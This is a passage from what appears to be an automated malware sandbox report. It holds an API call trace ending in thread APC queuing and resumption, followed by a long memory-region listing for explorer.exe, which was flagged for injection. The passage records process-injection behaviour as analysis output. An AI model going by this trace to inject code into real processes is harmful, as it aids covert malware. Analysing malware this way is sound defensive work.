[476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0067.292] NtQueueApcThread (ThreadHandle=0x12c, ApcRoutine=0x630dbac, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0067.295] NtResumeThread (in: ThreadHandle=0x12c, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0067.295] NtClose (Handle=0x12c) returned 0x0 [0067.299] PostThreadMessageW (idThread=0x614, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0067.460] NtDelayExecution (Alertable=0, Interval=0x12e134*=-30000000) returned 0x0 [0070.474] NtReadVirtualMemory (in: ProcessHandle=0x128, BaseAddress=0x6347a00, Buffer=0x12e158, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x12e158*, NumberOfBytesRead=0x0) returned 0x0 [0070.474] NtClose (Handle=0x128) returned 0x0 [0070.474] NtOpenProcess (in: ProcessHandle=0x12f1e8, DesiredAccess=0x438, ObjectAttributes=0x12eaa8*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x12ea7c*(UniqueProcess=0xbd4, UniqueThread=0x0) | out: ProcessHandle=0x12f1e8*=0x128) returned 0x0 [0070.474] NtOpenThread (in: ThreadHandle=0x12f1ec, DesiredAccess=0x1a, ObjectAttributes=0x12eaa8, ClientId=0x12ea74*(UniqueProcess=0x0, UniqueThread=0xbd8) | out: ThreadHandle=0x12f1ec*=0x12c) returned 0x0 [0070.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\cmmon32.exe", NtPathName=0x12e0f8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\cmmon32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0070.481] NtCreateFile (in: FileHandle=0x12e118, 
DesiredAccess=0x120089, ObjectAttributes=0x12e0e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\cmmon32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x12e100, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x12e118*=0x130, IoStatusBlock=0x12e100*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0070.484] NtQueryInformationFile (in: FileHandle=0x130, IoStatusBlock=0x12e100, FileInformation=0x12e058, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x12e100, FileInformation=0x12e058) returned 0x0 [0070.500] ExitProcess (uExitCode=0x0) [0070.501] UnhookWindowsHookEx (hhk=0xa018f) returned 1 [0070.501] CloseHandle (hObject=0x60) returned 1 [0070.501] CloseHandle (hObject=0x64) returned 1 [0070.502] VirtualFree (lpAddress=0x1310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.505] HeapDestroy (hHeap=0x1300000) returned 1 Thread: id = 65 os_tid = 0xbcc Process: id = "7" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f1e6320" os_pid = "0x610" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "6" os_parent_pid = "0xb84" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1089 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1090 start_va = 0x20000 
end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1091 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1092 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1093 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1094 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1095 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1096 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1097 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1098 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1099 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1100 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1101 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1102 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: 
id = 1103 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1104 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1105 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1106 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1107 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1108 start_va = 0x3c0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1109 start_va = 0x3f0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1110 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1111 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1112 start_va = 0x430000 end_va = 0x431fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1113 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1114 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1115 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1116 start_va = 0x470000 end_va = 0x570fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1117 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1118 start_va = 0x680000 end_va = 0x75efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1119 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1120 start_va = 0x7a0000 end_va = 0x7a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1121 start_va = 0x7b0000 end_va = 0x7b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1122 start_va = 0x7c0000 end_va = 0x7c0fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1123 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1124 start_va = 0x810000 end_va = 0x812fff entry_point = 0x810000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 1125 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1126 start_va = 0x830000 end_va = 0x859fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1127 start_va = 0x860000 end_va = 0x868fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000860000" filename = "" Region: id = 1128 start_va = 0x870000 end_va = 0x877fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1129 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1130 start_va = 0x890000 end_va = 0x893fff entry_point = 0x890000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1131 start_va = 0x8a0000 end_va = 0x923fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1132 start_va = 0x930000 end_va = 0xbb0fff entry_point = 0x930000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1133 start_va = 0xbc0000 end_va = 0x17bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1134 start_va = 0x17c0000 end_va = 0x1bb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017c0000" filename = "" Region: id = 1135 start_va = 0x1bc0000 end_va = 0x1e8efff entry_point = 0x1bc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1136 start_va = 0x1e90000 end_va = 0x1efbfff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1137 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1138 start_va = 0x2000000 end_va = 0x2024fff entry_point = 0x2000000 region_type = mapped_file name = 
"{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 1139 start_va = 0x2030000 end_va = 0x2033fff entry_point = 0x2030000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1140 start_va = 0x2040000 end_va = 0x2041fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 1141 start_va = 0x2050000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1142 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1143 start_va = 0x20e0000 end_va = 0x210ffff entry_point = 0x20e0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1144 start_va = 0x2110000 end_va = 0x2111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 1145 start_va = 0x2120000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1146 start_va = 0x2160000 end_va = 0x2160fff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id 
= 1147 start_va = 0x2170000 end_va = 0x2173fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1148 start_va = 0x2180000 end_va = 0x2183fff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1149 start_va = 0x2190000 end_va = 0x2191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 1150 start_va = 0x21a0000 end_va = 0x21a0fff entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1151 start_va = 0x21b0000 end_va = 0x21b0fff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1152 start_va = 0x21c0000 end_va = 0x21c3fff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1153 start_va = 0x21d0000 end_va = 0x21d0fff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1154 start_va = 0x21e0000 end_va = 0x21e0fff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1155 start_va = 0x21f0000 end_va = 0x21f0fff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1156 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1157 start_va = 0x2210000 end_va = 0x2210fff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1158 start_va = 0x2220000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1159 start_va = 0x2240000 end_va = 0x2241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1160 start_va = 0x2250000 end_va = 0x225cfff 
entry_point = 0x2250000 region_type = mapped_file name = "wininet.dll.mui" filename = "\\Windows\\System32\\en-US\\wininet.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wininet.dll.mui") Region: id = 1161 start_va = 0x2260000 end_va = 0x2267fff entry_point = 0x2260000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat") Region: id = 1162 start_va = 0x2270000 end_va = 0x2273fff entry_point = 0x2270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\cookies\\index.dat") Region: id = 1163 start_va = 0x2280000 end_va = 0x228ffff entry_point = 0x2280000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\index.dat") Region: id = 1164 start_va = 0x2290000 end_va = 0x229ffff entry_point = 0x2290000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\MSHist012017122020171221\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\mshist012017122020171221\\index.dat") Region: id = 1165 start_va = 0x22a0000 end_va = 0x22a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 1166 start_va = 0x2330000 end_va = 0x242ffff entry_point = 0x2330000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1167 start_va = 
0x2430000 end_va = 0x2430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1168 start_va = 0x2440000 end_va = 0x2441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 1169 start_va = 0x2450000 end_va = 0x2453fff entry_point = 0x2450000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1170 start_va = 0x2460000 end_va = 0x2461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 1171 start_va = 0x2470000 end_va = 0x2470fff entry_point = 0x2470000 region_type = mapped_file name = "{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{1FA14682-CABC-4310-BDEA-6ED0DE65ED67}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db") Region: id = 1172 start_va = 0x2480000 end_va = 0x2483fff entry_point = 0x2480000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1173 start_va = 0x2490000 end_va = 0x2490fff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1174 start_va = 0x24a0000 end_va = 0x24a0fff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1175 start_va = 0x24b0000 end_va = 0x24b0fff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1176 start_va = 0x24c0000 end_va = 0x24c0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000024c0000" filename = "" Region: id = 1177 start_va = 0x24d0000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1178 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 1179 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1180 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1181 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1182 start_va = 0x2580000 end_va = 0x25e5fff entry_point = 0x2580000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1183 start_va = 0x25f0000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 1184 start_va = 0x2630000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1185 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1186 start_va = 0x2740000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 1187 start_va = 0x2780000 end_va = 0x30affff entry_point = 0x2780000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: 
"c:\\windows\\fonts\\staticcache.dat") Region: id = 1188 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 1189 start_va = 0x30c0000 end_va = 0x30c3fff entry_point = 0x30c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1190 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 1191 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x30e0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1192 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x30f0000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1193 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x3100000 region_type = mapped_file name = "{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{4CA276EC-52B8-4975-9DCF-73426EA8BE98}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db") Region: id = 1194 start_va = 0x3110000 end_va = 0x3113fff entry_point = 0x3110000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 
"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1195 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x3120000 region_type = mapped_file name = "{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{AAA8DCD7-A38D-4E8A-B14C-574F94213A00}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db") Region: id = 1196 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x3130000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1197 start_va = 0x3140000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1198 start_va = 0x3180000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 1199 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 1200 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x31d0000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 1201 start_va = 0x31e0000 end_va = 0x31e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031e0000" filename = "" Region: id = 1202 start_va = 0x31f0000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1203 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x3230000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = 
"\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 1204 start_va = 0x3240000 end_va = 0x3241fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 1205 start_va = 0x3250000 end_va = 0x3251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003250000" filename = "" Region: id = 1206 start_va = 0x3260000 end_va = 0x3261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003260000" filename = "" Region: id = 1207 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 1208 start_va = 0x32b0000 end_va = 0x32e2fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 1209 start_va = 0x32f0000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 1210 start_va = 0x3330000 end_va = 0x3331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003330000" filename = "" Region: id = 1211 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 1212 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 1213 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003360000" filename = "" Region: id = 1214 start_va = 0x3370000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1215 start_va = 0x33b0000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 1216 start_va = 0x3400000 end_va = 0x3447fff 
entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1217 start_va = 0x3450000 end_va = 0x3452fff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 1218 start_va = 0x3460000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1219 start_va = 0x34a0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 1220 start_va = 0x34e0000 end_va = 0x34e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034e0000" filename = "" Region: id = 1221 start_va = 0x34f0000 end_va = 0x352ffff entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 1222 start_va = 0x3530000 end_va = 0x3531fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003530000" filename = "" Region: id = 1223 start_va = 0x3540000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1224 start_va = 0x3580000 end_va = 0x3581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003580000" filename = "" Region: id = 1225 start_va = 0x3590000 end_va = 0x3590fff entry_point = 0x3590000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1226 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 1227 start_va = 0x35b0000 end_va = 0x35b6fff entry_point = 0x35b0000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1228 start_va = 0x35c0000 end_va = 